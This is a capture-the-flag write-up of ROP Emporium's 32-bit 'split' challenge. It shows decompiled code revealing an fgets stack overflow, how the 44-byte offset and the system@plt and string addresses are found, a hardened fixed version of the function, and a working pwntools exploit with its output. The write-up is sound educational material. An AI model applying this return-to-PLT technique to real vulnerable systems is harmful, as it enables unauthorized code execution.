ROP split
File: split32

```
$ checksec split32
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)
```
IDA
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  puts("split by ROP Emporium");
  puts("32bits\n");
  pwnme();
  puts("\nExiting");
  return 0;
}
```

Step into pwnme():

```c
char *pwnme()
{
  char s; // [sp+0h] [bp-28h]@1   (IDA shows a 0x20-byte buffer at ebp-0x28)

  memset(&s, 0, 0x20u);
  puts("Contriving a reason to ask user for data...");
  printf("> ");
  return fgets(&s, 96, stdin);   // reads up to 95 bytes into a 32-byte buffer
}
```

There are two ways to get the offset here. One is to read it straight off the IDA annotation: 0x28 + 4 = 44. The other is the same as in ret2win: overflow with a cyclic pattern and recover 44 from the crash.
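The root cause is the size mismatch in pwnme(): fgets() is allowed 96 bytes into a 0x20-byte stack buffer, so bytes 0x28..0x2b of the input land on the saved return address. As an added illustration (not code from the challenge binary or this write-up), here is the same function with the read bounded by the buffer's own size and any over-long line drained; read_line_bounded, pwnme_fixed and the fmemopen-based helper pwnme_fixed_from_repeat are names chosen for this example.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>
#define BUF_LEN 0x20   /* same 32-byte buffer as the challenge's pwnme() */

/* Original shape (comment only, not compiled):  char s[0x20]; fgets(s, 96, stdin);
 * 96 > 32, so input bytes 0x28..0x2b overwrite the saved return address.
 * The fix bounds the read by the buffer size and drains an over-long line. */

/* Read one line into buf (at most buf_len-1 bytes, newline stripped).
 * Returns bytes stored, or -1 on EOF/error. */
int read_line_bounded(FILE *in, char *buf, size_t buf_len)
{
    if (buf_len == 0) return -1;
    memset(buf, 0, buf_len);
    if (fgets(buf, (int)buf_len, in) == NULL) return -1;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[--n] = '\0';                 /* whole line fitted */
    } else {                             /* truncated: drain the rest */
        int c; while ((c = fgetc(in)) != EOF && c != '\n') { }
    }
    return (int)n;
}

/* Hardened pwnme(): same prompt and buffer, read bounded by sizeof s. */
int pwnme_fixed(FILE *in)
{
    char s[BUF_LEN];
    puts("Contriving a reason to ask user for data...");
    printf("> ");
    return read_line_bounded(in, s, sizeof s);
}

/* Test helper: feed a constructed line of `count` copies of c via fmemopen().
 * Returns bytes stored, or -2 if part of the line was left unread. */
int pwnme_fixed_from_repeat(char c, size_t count)
{
    char line[128];
    if (count > sizeof line - 2) return -1;
    memset(line, c, count);
    line[count] = '\n'; line[count + 1] = '\0';
    FILE *f = fmemopen(line, count + 1, "r");
    if (f == NULL) return -1;
    int n = pwnme_fixed(f);
    int leftover = fgetc(f);              /* must be EOF */
    fclose(f);
    return leftover == EOF ? n : -2;
}
```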
Shift+F12 (IDA strings window):

```
.rodata:080486F0 00000016 C split by ROP Emporium
.rodata:08048706 00000008 C 32bits\n
.rodata:0804870E 00000009 C \nExiting
.rodata:08048718 0000002C C Contriving a reason to ask user for data...
.rodata:08048747 00000008 C /bin/ls
.eh_frame:080487C3 00000007 C ;*2$\"(
.data:0804A030 00000012 C /bin/cat flag.txt
```

We find both /bin/ls and /bin/cat flag.txt.
Click into usefulFunction (wow, I only learned this existed from reading a write-up! From now on I should browse IDA's function names properly).

```c
int usefulFunction()
{
  return system("/bin/ls");
}
```
If it were system("/bin/cat flag.txt") we would get the flag directly. So we need to push: offset + address of system + address of "/bin/cat flag.txt".

Address of system: searched hard and found the call to system:

```
.text:08048657 call _system
```

(That instruction's target is the system@plt stub at 0x08048430, which is the value the exploit script uses.)

Address of /bin/cat flag.txt: Shift+F12 finds it easily.

```
.data:0804A030 usefulString db '/bin/cat flag.txt',0
```
Setting context.log_level = "debug" makes the script print debug information while it runs, and you can use that output to find which step went wrong.

EXP (went back and studied pwntools syntax for a while, hehe):

```python
from pwn import *

p = process("./split32")
system = 0x08048430    # system@plt
catflag = 0x0804a030   # usefulString: "/bin/cat flag.txt"

# 44 bytes of padding up to the saved return address, then system@plt,
# a dummy return address for system, and the pointer to the string argument
payload = b"\x00" * 44 + p32(system) + p32(0) + p32(catflag)
p.sendlineafter(b"> ", payload)
print(p.recv())
p.interactive()
```
Output:

```
lxl@lxl-vm:~/rop/split/split32$ python split32.py
[+] Starting local process './split32': pid 2874
ROPE{a_placeholder_32byte_flag!}
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
```
ROPE{a_placeholder_32byte_flag!}